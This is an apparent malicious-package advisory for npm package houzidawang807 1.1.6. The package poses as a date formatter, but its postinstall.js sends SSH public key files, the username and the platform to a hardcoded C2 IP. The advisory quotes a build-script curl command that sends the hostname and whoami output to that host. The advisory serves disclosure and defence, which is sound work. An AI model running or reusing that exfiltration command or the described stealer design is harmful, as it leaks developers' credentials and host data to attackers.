VYPR

npm · Malicious package advisory

Malware

houzidawang807

MAL-2026-5731

Malicious code in houzidawang807 (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (7568d90e7a8d940b5618fa36bccfc2b7fa02ceaa814f0a416d2cc989c685e489)
Package advertises itself as 'a simple date formatting utility' but ships an SSH-key-stealing C2 client. postinstall.js enumerates ~/.ssh for *.pub files, collects the installer's username and platform, and POSTs a JSON payload over HTTPS to the hardcoded bare IP 124.221.154.135. Source comments explicitly label this destination as the attacker's C2 server.

package.json additionally declares a `build` script that curls http://124.221.154.135/pre?h=$(hostname)&u=$(whoami), leaking host identifiers in plaintext to the same C2.

The legitimate-looking surface is a 3-line formatDate wrapper in index.js; the rest of the package is attack tooling.

Although the malicious file is named postinstall.js, it is not currently wired into a lifecycle hook (scripts only declares `build`), so default `npm install` does not auto-execute it. However, the file is loaded by any consumer that requires the package or invokes the build script, and the file's name strongly suggests the author intends to enable it as a lifecycle hook in a follow-up version.

Compromised versions (1)

  • 1.1.6

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.